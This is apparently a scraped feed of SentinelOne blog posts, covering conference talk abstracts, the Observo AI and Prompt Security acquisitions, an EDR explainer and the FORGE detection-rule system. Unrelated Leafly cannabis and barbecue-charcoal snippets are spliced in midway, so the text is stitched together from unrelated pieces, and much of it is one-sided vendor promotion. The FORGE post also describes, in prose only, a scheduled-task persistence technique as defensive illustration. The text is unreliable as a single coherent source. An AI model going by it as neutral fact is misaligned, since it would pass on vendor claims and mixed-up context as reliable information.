In this talk, Silas Cutler (Censys) and Marc Rogers (nbhd.ai) present their analysis of the devices and current understanding of present backdoors. Additionally, this talk will cover past and ongoing efforts to hold transgressors accountable.

Auto-Poking The Bear – Analytical Tradecraft In The AI Age

Analytical tradecraft and shared standards have transformed Cyber Threat Intelligence from a niche discipline into a collaborative industry-wide research endeavor. Researchers and analysts now routinely build on each other’s work, creating a foundation of trust and shared methodology.

AI is disrupting this ecosystem, as we increasingly delegate data preparation, analysis, and entire workflows to AI assistants. Doing so will make us more productive, but not without cost. While you may trust your own AI-assisted analysis, can you trust another researcher’s prompts/agent process? As questions about reliability and transparency persist, we will need to adapt our research methodology and develop a new joint understanding of the promises, pitfalls, and probabilities inherent in AI-assisted work.

Dreadnode’s Martin Wendiggensen and Brad Palm tackle these challenges through a concrete case study, presenting their own LLM-based agentic system, developed to analyze Russian internet data leaked by Ukrainian cyber activists. The speakers walk through the system’s architecture and demonstrate its performance across tasks ranging from simple data collation to sophisticated analytical workflows to track adversaries.

Along the way, they outline how to understand the promises and limitations of this technology and more importantly, how to communicate them transparently to other researchers and audiences in order to maintain transparency and accountability for published products.

Hacktivism and War: Malicious Activism and Nation-State Fronts in Times of Conflict – A Clarifying Discussion

SentinelLABS’ own Jim Walter explores how malicious hacktivist activity is being strategically leveraged by nation-states and mercenary groups to obscure intent, destabilize targets, and weaponize public narratives. Through technical case studies and geopolitical analysis, Jim’s talk examines how these actors blend ransomware, data leaks, DDoS, and psychological operations under activist façades—creating significant challenges for attribution, response, and long-term threat modeling.

Combined with a review of existing and still highly-prolific traditional hacktivist groups and their role in the current landscape, this presentation offers to bring some much needed clarity to a very murky and confusing landscape.

Simulation Meets Reality: How China’s Cyber Ranges Fuel Cyber Operations

Between late 2024 and early 2025, the United States government issued indictments or sanctions against three Chinese information security firms – i-SOON, Sichuan Silence, and Integrity Tech – alleging their support for or links to malicious cyber groups targeting US government and critical infrastructure systems.

In their research, Mei Danowski (Natto Thoughts) and Eugenio Benincasa (ETH Zurich) found that all three companies serve as a key seedbed for nurturing China’s offensive cyber talent with cyber range services, which train cybersecurity professionals through “attack-defense live-fire” (攻防实战) exercises. Alongside hacking contests and crowdsourced bug bounty programs, attack-defense live-fire exercises are one of the primary mechanisms leveraged by the Chinese government to enhance its cyber capabilities, with support from a rapidly growing private cybersecurity industry with more than 4000 products and services providers.

This presentation focuses on the development of attack-defense exercises and commercial cyber ranges in China, areas that have received relatively little attention to date.

The talk examines how this ecosystem is shaping China’s offensive cyber capabilities and discusses 120 companies identified as providers of attack-defense exercises and cyber range services.

CamoFei Meets the Taliban

SentinelLABS’ Aleksandar Milenkoski and Insikt Group’s Julian-Ferdinand Vögele team up once again to bring you a unique talk on CamoFei, a threat actor that overlaps with ChamelGang (aka TAG-112, Evasive Panda), and which sets itself apart within the landscape of China-linked APT groups through a dual-track operational model that blends traditional cyber espionage with disruptive activities.

The group continues to target high-profile entities of strategic interest to Chinese intelligence, including Tibetan and Taiwanese organizations, while simultaneously engaging in operations that suggest influence or destabilization objectives, often layered with plausible deniability.

As of early 2025, CamoFei remains highly active, expanding its reach across a diverse set of governmental and private-sector targets in Southeast Asia, Europe, and the Middle East while adopting new tactics and techniques. Its recent compromise of Taliban networks in Afghanistan, which coincided with a suspected hack-and-leak influence campaign targeting the Taliban itself, points to a possible evolution toward hybrid operations that merge technical intrusions with geopolitical narratives.

While the shift remains unconfirmed, it reflects the broader challenge posed by the increasingly blurred lines between espionage, influence operations, and cybercrime, making attribution and intent analysis more difficult.

As multiple CamoFei victims exhibit signs of concurrent compromise by other Chinese-nexus groups, the case underscores a broader analytic challenge, namely, that overlapping intrusions within the same victim environments complicate attribution and intent analysis, raising important questions about coordination, operational autonomy, and competition within the broader Chinese threat ecosystem.

SentinelOne has long been – and continues to be – a strong advocate and supporter of MITRE and the critical role it plays advancing cybersecurity and being a force for good. The MITRE ATT&CK Evaluations have historically set the standard in helping vendors advance their offerings while helping practitioners evaluate products for their unique security needs. Done right, nothing has come close – a high bar we and the industry hope MITRE will continue to maintain for the foreseeable future.

As we conveyed to the MITRE team, SentinelOne has decided not to participate in the Enterprise evaluation this year. This decision was reached after a thorough review internally and is being made so that we can prioritize our product and engineering resources on customer-focused initiatives while accelerating our platform roadmap.

We look forward to maintaining a close relationship with MITRE and the ATT&CK Evaluations team, and we plan to continue to work with them on safeguarding organizations, data, AI, and critical infrastructure across the globe.

This morning, SentinelOne entered an agreement to acquire Observo AI—a deal that we believe will prove to be a major accelerator for our strategy and a key step forward in realizing our vision.

Data pipelines are key to any enterprise IT transformation. Data pipelines, On-premise, and cloud-native are the modern-day router for how all information technology runs. This is especially pronounced today with the need to make accessible highly sanitized, critically contextualized data into LLM-based systems, to truly unlock an agentic AI future. At the same time, enterprises need to critically move data from legacy systems, and into scaleable, ideally real-time-enabling technologies. A robust data pipeline that can move data from any source to any destination is a critical need to successfully modernize any IT environment, and on all clouds, including Microsoft Azure, AWS, and GCP, and even move data between them. All in a completely secure way. Modern data pipelines don’t stop at just routing data, they filter it, transform it and enrich it, inline, and in real time—an imperative for data efficiency and cost optimization.

Simply put, moving data freely between systems is a huge technological advantage for any enterprise, especially right now.

This is why we acquired Observo.AI, the market leader in real-time data pipelines. It’s a deal that we believe will have huge benefits for customers and partners alike.

We want to make it clear that we pledge to continue offering Observo’s data pipeline to all enterprises, whether they’re SentinelOne Singularity customers or not. We support complete freedom and control to help all customers to be able to own, secure, and route their data anywhere they want.

For security data specifically, data pipelines are the heart that pumps the blood. Unifying enterprise security data from all possible sources, end products and controls, security event aggregators, data lakes, and any custom source on premise or cloud based. As I mentioned above, the data pipeline juncture is a critical one for the migration of data.

The best security comes from the most visibility. Observo.AI will give SentinelOne the ability to bring data instantly into our real time data lake—allowing for unprecedented outcomes for customers, and marking a huge leap forward towards, unified, real time, AI-driven security, and one step closer to supervised autonomous security operations.

Data pipelines and the state of security operations

Today’s security operations teams don’t suffer from a lack of data. They suffer from a lack of usable data, latency, and relevant content.

The major culprit? Legacy data pipelines that weren’t built for modern, AI-enabled SOCs and today’s ever expanding attack surface. The result is increased cost, complexity, and delay—forcing compromises that reduce visibility, limit protection and slow response.

Enter Observo AI—a modern, AI-native data pipeline platform that gives enterprises full control over their data flows in real time.

With the acquisition of Observo AI, SentinelOne will address customers’ most critical security data challenges head-on.

Observo AI delivers a real-time data pipeline that ingests, enriches, summarizes, and routes data across the enterprise—before it ever reaches a SIEM or data lake. This empowers customers to dramatically reduce costs, improve detection, and act faster across any environment. As a result, we can create significant new customer and partner value by allowing for fast and seamless data routing into our AI SIEM, or any other destination.

It’s an acquisition and decision many months in the making—the result of an exhaustive technical evaluation, deep customer engagement, and a clear conviction grounded in the same disciplined approach we apply to all of our M&A activities. When you are thorough and do the hard work to identify the best possible technology, you can shorten the time to market and improve customer outcomes. And, in this case, the conclusion was clear: Observo AI is the best real time data pipeline platform on the market, by far.

Growing data, growing complexity and growing attack surface

As data volumes grow across endpoints, identity, cloud, GenAI apps, intelligent agents, and infrastructure, the core challenge is no longer about collection. It’s about control. Security teams need to act faster—across an ever expanding attack surface—with greater context and lower overhead. But today’s data pipelines are bottlenecks—built for batch processing, limited in visibility, static, and too rigid for modern environments.

To move security toward real autonomy, we need more than detection and response. We need a streaming data layer that can ingest, optimize, enrich, correlate and route data intelligently and at scale.

By joining forces with Observo AI, SentinelOne can deliver a modern, AI-native data platform that gives enterprises full control over their data flows in real time—allowing for fast and seamless data routing into our SIEM, or any other destination.

It also strengthens the value we’re already delivering with Singularity and introduces a new model for reducing data costs and improving threat detection, across any SIEM or data lake—helping customers lower data overhead, improve signal quality, and extract more value from the data they already have, no matter where it lives.

Legacy data pipelines give way to the next generation

Yesterday’s security data pipelines weren’t designed for autonomous systems and operations. They were built for manual triage, static rules, and post-ingestion filtering. As organizations move toward AI-enabled SOCs, that model breaks down.

Data today is:

• Duplicated and noisy
• Delayed in enrichment and normalization
• Inconsistent across environments
• Expensive to ingest and store
• Dynamic in nature while solutions are rigid

The result is that too many security operations teams are forced to compromise— compromise for cost, for speed, for complexity, for innovation, and worse of all—compromise on the right visibility at the right time.

Observo AI is defining the next generation of data pipelines that change that by acting as an AI-driven streaming control plane for data. It operates upstream of SIEMs, data lakes, and AI engines—applying real-time enrichment, filtering, routing, summarizing, and masking before the data reaches storage or analysis. All this is achieved utilizing powerful AI models that continuously learn from the data.

It doesn’t just process more data. It delivers better data, faster, and with lower operational overhead.

The result is that teams can now harness the full benefit of all data in the SOC without compromise.

Observo AI’s real-time data pipeline advantage

Observo AI ingests data from any source—on-prem, edge, or cloud—and routes data to any destination, including SIEMs, object stores, analytics engines, and AI systems like Purple AI.

Key capabilities include:

• Open integration – Supports industry standards and formats like OCSF, OpenTelemetry, JSON, and Parquet—ensuring compatibility across diverse ecosystems.
• ML-based summarization and reduction – Uses machine learning to reduce data volume by up to 80%, without losing critical signal.
• Streaming anomaly detection – Detects outliers and abnormal data in flight, not after the fact.
• Contextual enrichment – Adds GeoIP, threat intelligence, asset metadata, and scoring in real time.
• Field-level optimization – Dynamically identifies and drops redundant or unused fields based on usage patterns.
• Automated PII redaction – Detects and masks sensitive data across structured and semi-structured formats while streaming.
• Policy-based routing – Supports conditional logic to forward specific subsets of data—such as failures, high-risk activity, or enriched logs—to targeted destinations.
• Agentic pipeline interface – Enables teams to generate and modify pipelines through natural language, not just static configuration files.

What We Learned from Evaluation and Customers

Prior to today’s announcement, we conducted a hands-on technical evaluation of the broader data pipeline landscape. We started with nine vendors and down-selected to four based on architecture, maturity, and extensibility.

To evaluate potential technology OEM partners, we conducted a structured scoring process across 11 technical dimensions, each representing a critical capability for scalable, secure, and high-performance data ingestion and transformation.

The evaluation criteria included:

• Scalable data ingestion
• On-prem and cloud collection support
• Monitoring and UX
• Speed of integrationBreadth of pre-built security integrations
• OCSF mapping and normalization
• Data transformations and enrichment capabilities
• Filtering and streaming support
• Sensitive data detection (PII)
• Anomaly detection
• Vendor lock-in mitigation (e.g., open formats, agnostic routing)

Each category was scored using a 3-tier rubric:

• Exceeds Expectations – mature, production-grade capability
• Meets Expectations – functionally sufficient, may require optimization or future roadmap improvements
• Does Not Meet Expectations – unsupported or significantly limited

Final vendor scores were calculated by normalizing across all 11 categories, enabling a comparative ranking based on technical depth, deployment readiness, and extensibility. Based on this methodology, Observo emerged as the clear front-runner, outperforming all other solutions in performance, UX, protocol support, and time-to-value.

Observo AI emerged as the clear leader—scoring highest across nearly every category. It wasn’t close.

We also conducted dozens of SentinelOne customer interviews across industries—ranging from high-scale technology firms to Fortune 500 enterprises. These organizations often operate at ingest volumes in the tens of terabytes per day, with clear plans to scale past 100+ TB/day.

Across those conversations, one theme was consistent: Observo AI was the best—the only next-generation, highly scalable data pipeline solution that was in serious consideration.

Other solutions were seen as either too rigid, too complex to manage, or lacking in automation and scale. Some were viewed as solid first-generation attempts—good for basic log shipping, but not built for real-time, AI-enabled operations.

Observo AI stood out for its ease of deployment, intuitive interface, rapid time to ROI, and overall maturity across cost optimization, AI support, and customer experience. As Lucas Moody, CISO of Alteryx, put it: “Observo AI solves our data sprawl issue so we can focus our time, attention, energy, and love on things that are going to matter downstream.”

In summary

• Legacy data pipelines built for another era are forcing compromises that reduce visibility, limit protection and slow response for security operations teams managing today’s SOC
• Observo AI is the defining AI-native, real-time data pipeline that ingests, enriches, summarizes, and routes data across the enterprise—before it ever reaches a SIEM or data lake
• With Observo AI we will help customers dramatically reduce costs, improve detection, and act faster across any environment
• This will be an accelerant to our AI SIEM strategy and our data solutions—creating significant new customer and partner value and bringing the autonomous SOC one step closer to reality

We’re excited to welcome the Observo AI team to SentinelOne, and even more excited about what this unlocks for our customers—a data pipeline built for the age of AI and autonomous security operations.

For any customer looking to route, ingest or optimize any type of enterprise data, with its vast integration ecosystem, and ML driven pipelines, Observo.AI is the best technology in the market, and the fastest to deploy, to start seeing real outcomes—now.

Cybercrime went from a nuisance to a threat when its practitioners realized their crimes could produce benefits such as financial gain, political pressure, and to promote causes supported by the attackers. This spurred innovations in offensive methodologies and required defenders to evolve further. Today, we have fully funded threat operations, state-backed and organized as a standard business. This operationalization of cybercrime has unlocked an era of threats with focused agendas and more tangible impact to business. Defensive technology has kept pace with threats to a degree, but this rapid expansion has left organizations struggling to keep up in an enigmatic market of security solutions.

The persistence of older security products now complicates the endpoint protection landscape. Available solutions include varying terminology like antivirus (AV), next-generation anti-virus (NGAV), endpoint protection platform (EPP), endpoint detection and response (EDR), and the most recent arrival to the space, modern endpoint detection and response (Modern EDR). While all of these solutions are focused on endpoint security, they vary in terms of the technology implemented and directional focus of the solution, and their ability to stop threats and threat actors.

This blog post reviews the fundamentals of endpoint security solutions so organizations can confidently navigate the landscape and choose defenses that truly match their environments.

The Evolution of Threats

Adversarial tactics have evolved significantly from the early days of the internet. The browser plugins and pop-up adware, while still present today, were the kings of the cyber underground in the early aughts of the century. While those malware are easy to detect and AV solutions quickly came to the rescue, the threat actors did not stop evolving there, have not stopped since, and are not expected to stop anytime soon. This is where the implementation of AI-based technology shows its advantage.

Modern EDR toolsets, while still maintaining the old-school antivirus protections, integrate the advantages of NGAV by monitoring system behavior to identify potential attacks that may not have been detected by signature-based scanning. Coupled with a deep integration with AI, Modern EDR expedites response operations significantly. This is particularly prudent when it comes to novel threats, where behavioral detection and AI assistance enable response with the same speed as a known threat. Modern EDR solutions then use this telemetry to refine their detection logic automatically, scaling detection capabilities.

Separating Modern EDR toolsets from the rest of the field further is their implementation of generative AI models and agentic workflows to assist in threat hunting and incident response operations. Natural language queries, or enabling analysts to perform investigations without being a query language expert, allows security teams to be more efficient and effective, while upleveling analysts to perform above their station.

The Modern EDR field is limited, currently, with one solution standing out above the rest: SentinelOne’s Singularity Endpoint.

Understanding the Fundamentals: AV, NGAV & EPP

Antivirus (AV)

At the foundational level, your endpoints need some type of antivirus. This typically correlates to “signature-based detection,” meaning the security solution is scanning your files against a library of known malicious file signatures. Suppose a file on your computer matches the signature of a malicious file. In that case, a detection occurs, and generally, some form of quarantine or cleaning action is taken to mitigate the threat posed by the malicious file.

This type of detection was ideal for the early days of the internet when malware and cybercrime were in their nascency, and is still applicable today for the more basic or well-known attacks, but does not constitute a full endpoint protection solution in the current threat landscape.

Next-Generation Antivirus (NGAV)

As threat actors iterated on their tactics and the tools they used, relying on known malicious signatures fell out of sufficiency. While still required for a holistic security posture, signature-based scanning was not able to identify the most novel threats, creating avenues for malicious payloads to bypass current protections. Behavioral analysis and the integration of machine learning into endpoint protection were the solution. By analyzing the behavior of the system, on top of signature scanning, NGAV was able to identify anomalous behavior from threats that may not have a known signature yet. This elevated protections to meet the newest threats of the time, ransomware.

Endpoint Protection Platform (EPP)

Endpoint protection platforms were the next to make their way to market, carving out a segment of endpoint security not adequately addressed by antivirus, proactive prevention. EPP is often confused with AV, but its focus is different and worth understanding. EPP focuses on preventing attacks through attack surface reduction and device control, making your endpoints a harder target for adversaries. This puts the focus on preventing malware from reaching the laptop through firewall controls, USB port blocking, and other endpoint settings configurations that limit avenues for malicious files to make it to your computer’s operating system. EPP is a critical security feature that you should have deployed in your environment, protecting your assets in tandem with an AV solution.

The Rise of EDR: Legacy vs Modern

Legacy Endpoint Detection & Response

AV, NGAV, and EPP gave rise to what had become the mainstay option for organizations looking to secure their endpoints until recently: endpoint detection and response. EDR is the combination of signature-based detection, endpoint control, and moderate implementation of machine learning for endpoint security. EDR tools enhance signature-based AV with behavioral monitoring, monitoring system processes and actions for patterns that align with more advanced attacks such as ransomware, and provide more advanced, and sometimes automated, response actions. Additionally, EDR suites enable more effective investigation and response to security incidents through a centralized portal and investigative tools.

EDR solutions accomplish this through log and telemetry data pulled from the endpoint into their centralized platform for analysis. This provides deeper visibility into endpoints than AV/EPP, and more advanced response capabilities through automation.

This combined package of AV, NGAV, EPP, and a centralized investigation and response platform was the right solution for the needs of the time, and has been a strong iterative improvement of endpoint protection capabilities, but is not the end of the evolutionary line for endpoint security. EDR toolsets, while powerful, require skilled hands to operate and often come with a steep learning curve. In the current labor market, organizations struggle to fill higher-level security engineering positions, and those are the exact roles that are responsible for administering EDR solutions, leaving many organizations under-protected with misconfigured security toolsets. The analysts that are on the team are often overwhelmed with the number of alerts generated by the EDR solution, each requiring a level of manual investigation, and often lacking some critical context that would help expedite investigative operations.

Modern Endpoint Detection & Response: The Next Chapter

These gaps, and the advancement of artificial intelligence technologies, have led to the rise of the latest iteration on endpoint security, Modern EDR. Building on the heritage of AV, NGAV, EPP, and EDR, and leveraging AI and automation, Modern EDR increases the likelihood of stopping attacks, and the speed at which organizations can investigate and respond to security threats. This operational boost is a product of Modern EDR solutions placing heavy emphasis on AI implementations in detections, investigations, automation, and proactive defenses, making them more effective against zero-day vulnerabilities, limiting organizational attack surfaces, and reducing overall risk.

Modern EDR integrates the comprehensive log collection, threat prevention, detection, and response capabilities of traditional EDR with cutting-edge AI and automation for enhanced detection and response. Leveraging advanced reasoning and language models for sophisticated threat hunting and analysis, proactive prioritization, and advanced automation for efficient threat mitigation and response, this potent amalgamation of technologies enables teams to do more with less, empowers analysts to investigate incidents more effectively without the steep experience requirement, and expedites response actions through automation.

Modern EDR solutions also expand their monitoring capabilities to other aspects of the environment, such as Software-as-a-Service (SaaS) solutions and identity platforms, through integrations with a centralized console, giving rise to the extended detection and response (XDR) moniker. XDR primarily relates to this expansion of integrations across attack surfaces beyond endpoints, enabling even wider visibility across organizational assets and solutions.

Why Modern EDR with AI-Assisted Tooling is Optimal

Organizations looking for an endpoint security solution in 2025 have a plethora of options available to them, each with its own terminology and marketing that can make the decision a quagmire for business leaders. In the current threat landscape, adopting a more forward-looking solution, such as a Modern EDR tool that heavily utilizes AI technologies and automation, is required to stay at pace with the evolving threats and attack techniques.

The advantages seen from Modern EDR solutions are easily illustrated across three domains: AI implementation, automation, and proactive defense.

AI Implementation

Modern EDR toolsets take full advantage of the technology available today, with an eye on innovating as that technology evolves. This is seen through the implementation of artificial intelligence across the product for detection, administration, automation, and operations.

A hallmark feature of Modern EDR is the use of generative AI for natural language query development. This enables analysts to perform investigations and craft detection queries without being an expert in the specific query language of the toolset, effectively boosting level one analysts to perform at a level two or three standard.

Noise reduction is another key area where Modern EDR toolsets stand out. AI detection engines are utilized to detect threats as well as determine the fidelity of any given detection. By eliminating low confidence detections and alerts, Modern EDR solutions reduce the overall alert volume analysts are burdened with, reducing the associated alert fatigue that can have detrimental impact to security operations.

Automation

Many AV and EDR options contain automation to a certain degree, enabling automated quarantine or cleaning options, but that is not enough in the current threat landscape. Automations should extend beyond immediate containment to assist the analyst responsible for investigations, and expand beyond the EDR solution to enable more efficient workflows with connected utilities. This is a further implementation of AI that helps lower mean time to respond (MTTR) metrics and reduce exposure windows through immediate data and context availability for the analyst. Assisted by automated workflows that remove smaller tasks that would consume additional analyst time, such as establishing a Zoom bridge or Slack channel for response operations, further expedites security operations and allows analysts to stay focused on the investigation at hand. 

AI implementations can also aid in the investigation process through advanced correlation of events across log sources, building an attack story that can aid analysts in determining the root cause of the incident, potential access vectors, and the total scope of affected systems. While this data is available within legacy EDR solutions, it often requires manual investigation by the analyst, requiring a more elevated skillset to be performed effectively, and taking significantly more time, while a threat actor may be within the environment.

Proactive Defense

The benefits of AI-assisted tooling in incident response are easily visualized, but focus also needs to be applied to the proactive or prevention side of endpoint security. Several EDR solutions include EPP-like functions for reducing attack surfaces, which is the minimum that should be expected from a current Modern EDR solution. With the implementation of AI, Modern EDR customers can benefit from collective intelligence through connected models sharing indicator information across multiple organizations. This means a novel threat cannot stay novel for long, with other environments utilizing the same AI solutions being inoculated against the threat after its first detection.

Modern EDR solutions may also provide a level of AI-powered offensive security tooling for identifying potential security gaps or misconfigurations within the infrastructure, attempting minor exploits against the environment, and providing further assistance in reducing attack surfaces. While not a replacement for an annual penetration test, these engines can help identify weaknesses between exercises, helping maintain security over the course of the year.

Conclusion

AV, NGAV, EPP, EDR, and Modern EDR coexisting in the market can present a challenge for business leaders trying to make the right decision for their organization’s endpoint security, and knowing the differences between the options can be a significant advantage. Legacy AV and EPP products are not sufficient for today’s threat landscape, and businesses should instead be looking for advanced solutions that include them. EDR options, while utilizing machine learning, do not go far enough to enable security operations or take full advantage of currently available technologies. Modern EDR solutions are the next iteration of endpoint security and come with advantages unmatched by legacy solutions, enabling organizations to run more efficient security operations, uplevel analysts, and build stronger proactive defenses. In an age of rapidly evolving threats, utilize a security solution that can keep up.

Stuck with a legacy endpoint protection solution that struggles to keep up with current threats? Check out SentinelOne’s Modern EDR solution: Singularity Endpoint. Book a demo today to see how Singularity Endpoint can protect your organization with an AI-powered first line of defense.

The latest addition to RCC’s Mood line melts stress & lifts your spirits Rare Cannabinoid Company (RCC) takes your mood as seriously as you do. They’re constantly on the front lines of innovation, creating products using exciting blends of hemp cannabinoids that can help relieve stress and help you find your joy. The Hawaiian brand […]

The post We tried Rare Cannabinoid Company’s THC+CBC Mood Oil appeared first on Leafly.

There is something nostalgic about the smell of burning charcoal. So when The Good Charcoal Company reached out with an offer to review their Super Briquettes, I jumped at the chance.

The post The Good Charcoal Super Briquettes Review appeared first on Angry BBQ.

Staying ahead of cyber threats means constantly evolving defenses and stopping new and often unpredictable threats. From its founding, SentinelOne has embraced AI as a means of detecting and autonomously responding to novel malware and TTPs, revolutionizing and setting the standard for modern endpoint protection in the process.

It’s not just central to our philosophy, it’s a core architectural tenet. It is how we give customers the advantage of speed and innovation when defending themselves against sophisticated nation state actors, constantly evolving ransomware variants, and the rise of a cybercriminal underground that keeps lowering the barrier to entry for the financially or politically motivated. Simply put, it’s how we stop modern attacks before they happen.

With the introduction of our new Framework for Optimized Rule Generation and Evaluation, or FORGE, SentinelOne is building on that foundation by using the power of agentic AI and large language models (LLMs) to completely reimagine and accelerate how teams create new, adaptive detection rules to stop ever-evolving threats.

The “AlphaEvolve Moment” Within the Cyber Space

Recently, Google DeepMind revealed AlphaEvolve, a powerful AI agent that evolves and optimizes algorithms for computing challenges. While AlphaEvolve explores the future of evolving algorithms in computing, SentinelOne’s FORGE₁ offers a highly analogous approach in cybersecurity – an operationalized system for enhancing threat detection for real-world enterprise environments. Like AlphaEvolve, FORGE combines the creative problem-solving power of AI and LLMs with a rigorous evaluation process, enabling it to quickly generate highly effective, precise, and adaptive detection rules.

Traditional detection engines and AI-based models offer comprehensive coverage and are effective at identifying common attack patterns, forming a solid foundation for threat detection. However, updating and deploying models can be slow and complex, while attackers continually evolve their methods in real-time. Detection rules enable teams to close emerging detection gaps in a timely way, as well as fine-tune coverage.

The downside is that writing and maintaining these rules is slow, even for experts, requiring repeated testing to avoid false positives or blind spots. FORGE addresses this challenge by automatically generating high-quality rule candidates, significantly reducing manual effort and strengthening the detection stack.

Unlike traditional approaches, where rules can quickly become outdated in the face of sophisticated evasion techniques, FORGE utilizes diversified AI prompts to dynamically generate multiple rule candidates, which then undergo a rigorous, multi-tiered evaluation, ensuring that only the highest-quality rules are advanced to deployment.

Much like AlphaEvolve’s iterative approach, which uses automated evaluation to refine algorithms systematically, FORGE continuously learns and improves detection logic. When a rule does not meet the stringent precision and recall criteria, feedback is automatically integrated to guide AI-driven revisions. The result is an iterative refinement loop where detection logic rapidly adapts to emerging threats to minimize false positives and maximize coverage.

Example: Using Native OS Capabilities to Execute Malicious Code

Let’s take a look at an example where FORGE aids in our detection capabilities.

Figure 1 below represents a very typical example of how malware can maintain persistence on a Windows machine using built-in tools. The workflow is broken down into the following:

• The attacker uses the Scheduled Tasks executable (schtasks.exe) to create a new task named “Skype” that runs every 30 minutes.
• This task is configured to execute a JavaScript file called 1.js located in the user’s temporary files folder.
• When the task runs, it launches wscript.exe, which is the Windows Script Host used to execute .js files.
• As a result, this 1.js script is executed repeatedly on the system.

This technique is dangerous because it leverages entirely legitimate Windows components, making it difficult to detect and mitigate. By naming the task something inconspicuous such as “Skype” and placing the script in a temporary directory, the attacker avoids drawing attention. Malware authors often employ this method to ensure their code continues to run even after the system reboots or the user logs out.

We can tackle this problem with FORGE as it can easily create a detection rule to differentiate between malicious and non-malicious tasks.

How FORGE Helps Detect Malicious Activities

In Figure 2 below, we can see how FORGE generates and refines a detection rule for identifying malicious use of Windows Scheduled Tasks to execute JavaScript malware.

First, a broad rule flags any use of schtasks.exe with a command line referencing the Temp folder. While it captures many true positives in this example (257), the broad rule yielded a low precision rate of 65%, meaning it generated many false alarms.

Here, we iterate with the next generation of the rule created by FORGE. FORGE allows us to reduce noise by adding a condition that the parent command line must include “Skype”. However, this made the rule too narrow and it only caught 2 cases, though with perfect precision.

Finally, a more balanced and effective rule is created. FORGE checks for the creation of a scheduled task (create) that targets a JavaScript file (.js) in the Temp folder,and requires that the parent process be wscript.exe.

This rule now yields a high precision (99%) and successfully captures all 257 true positives, striking the right balance between generality and specificity.

This example illustrates how detection logic evolves through iterative tuning to enhance accuracy and minimize false positives in threat detection systems. It is important to note that FORGE does not replace our analysts. Rather, it eliminates the repetitive elements of rule generation and tuning, allowing analysts to concentrate on in-depth threat analysis and proactive defense strategies.

FORGE sets a new standard for AI-driven cybersecurity, enabling us to be agile, precise, and remain steps ahead of attackers.

₁ Patent Pending

Third-Party Trademark Disclaimer

All third-party product names, logos, and brands mentioned in this publication are the property of their respective owners and are for identification purposes only. Use of these names, logos, and brands does not imply affiliation, endorsement, sponsorship, or association with the third-party.

Singularity XDR

Discover and mitigate threats at machine speed with a unified XDR platform for the entire enterprise.

Get a Demo

Organizations around the globe are rapidly adopting AI and embracing accelerated creativity and output, but with this vast opportunity come enormous challenges: visibility, compliance, security, control. From the growth of AI tool usage outside IT and infosec to the emergence of autonomous AI agents and agentic workflows, the undeniable benefits of AI often open the door to novel cyber threats and data privacy concerns, but even more often, to misuse and leakage of sensitive information.

SentinelOne pioneered AI Cybersecurity beginning at the endpoint and this strategy has rapidly evolved to the cloud, AI SIEM, and generative and agentic AI to protect every aspect of enterprise security. Now, we’re taking that strategy a step further, signing a definitive agreement to acquire Prompt Security – a rapidly growing company empowering and enabling organizations to use AI and AI agents securely – today. The immediate visibility and control Prompt Security delivers to all employee use of GenAI applications in the work environment is unparalleled.

Embrace AI without compromising visibility, security, or control

Prompt Security CEO Itamar Golan and his team were early champions of AI as a force for productivity, innovation, and transformation. As a cybersecurity veteran of Orca and Checkpoint, Golan was quick to realize that security risks would be the single biggest blocker to widespread AI adoption. This need is what has driven Prompt Security’s approach from the start – providing companies with the ability to encourage and deploy employee AI usage without compromise.

Prompt Security’s technology helps organizations by integrating across browsers, desktop applications, and API’s. This includes real-time visibility into how AI tools are accessed, what data is being stored, and automated enforcement to prevent prompt injections, sensitive data leakage, and misuse.

This design and approach is highly complementary to SentinelOne’s AI strategy and the Singularity Platform; creating a unique, integrated layer for securing AI in the enterprise – protecting tools where and how they are used, and creating customer value in a way no other solution in the market can match.

The Prompt Security Difference

Prompt Security enables organizations and users to confidently leverage tools like ChatGPT, Gemini, Claude, Cursor, and other custom LLMs by providing IT and security teams visibility, security, and real-time control – even over unmanaged AI use.

Real-Time AI Visibility

Prompt Security’s lightweight agent and browser extensions automatically discover both sanctioned GenAI apps and unsanctioned Shadow AI wherever employees work. This includes browsers, desktop IDEs, terminal-based assistants, APIs, and custom workflows. The platform maintains a live inventory of usage across thousands of AI tools and assistants. Every prompt and response is captured with full context, giving security teams searchable logs for audit and compliance. This is a great complement to our existing presence on the endpoint, and will enable us to accelerate our GenAI DLP capabilities.

Policy-Based Controls

Granular, policy-driven rules let teams redact or tokenize sensitive data on the fly, block high-risk prompts, and deliver inline coaching that helps users learn safe AI practices without losing productivity.

AI Attack Prevention

The platform inspects every interaction in real time to stop prompt injection, jailbreak attempts, malicious output manipulation, and prompt leaks. It is designed to maintain low latency so users experience no disruption.

Model Agnostic Coverage

Safeguards apply uniformly across all major LLM providers including OpenAI, Anthropic, and Google, as well as self-hosted or on-prem models. The fully provider-independent architecture fits into any stack, whether SaaS or self-hosted.

MCP Gateway Security

Prompt Security’s MCP Gateway sits between AI applications and more than 13,000 known MCP servers, intercepting every call, prompt template, and response. Each server receives a dynamic risk score, and the system enforces allow, block, filter, or redact actions.

The Future of AI Security

AI is the most transformative force in the world today, but without security, it becomes a liability. SentinelOne has long set the standard on how AI can transform cybersecurity. This acquisition unlocks a new frontier of platform expansion for SentinelOne and represents a step forward in our AI strategy – from AI for security to security for AI. It cements SentinelOne’s leadership in securing the modern AI-powered enterprise, and it also puts in the center the main thing that acquisitions are about- solving real customer problems, improving security, and creating tangible value for security teams- allowing them to lead their business safely and responsibly to the AI age.

Protecting the usage of AI tools without compromising safety or inhibiting productivity is critical to their continued adoption and together, SentinelOne and Prompt Security provide the tools and confidence to make that a reality.

The ink may still be drying but the next chapter of SentinelOne’s growth story has officially begun. On behalf of all Sentinels, our partners, and our customers, I couldn’t be happier to welcome the Prompt Security team to SentinelOne!

Forward Looking Statements

This blog post contains forward-looking statements. The achievement or success of the matters covered by such forward-looking statements involve risks, uncertainties and assumptions. If any such risks or uncertainties materialize or if any of the assumptions prove incorrect, our results could differ materially from the results expressed or implied by the forward-looking statements. Please refer to the documents we file from time to time with the U.S. Securities and Exchange Commission, in particular, our Annual Report on Form 10-K and our Quarterly Reports on Form 10-Q. These documents contain and identify important risk factors and other information that may cause our actual results to differ materially from those contained in our forward-looking statements. Any unreleased products, services or solutions referenced in this or other press releases or public statements are not currently available and may not be delivered on time or at all. Customers who purchase SentinelOne products, services and solutions should make their purchase decisions based upon offerings that are currently available.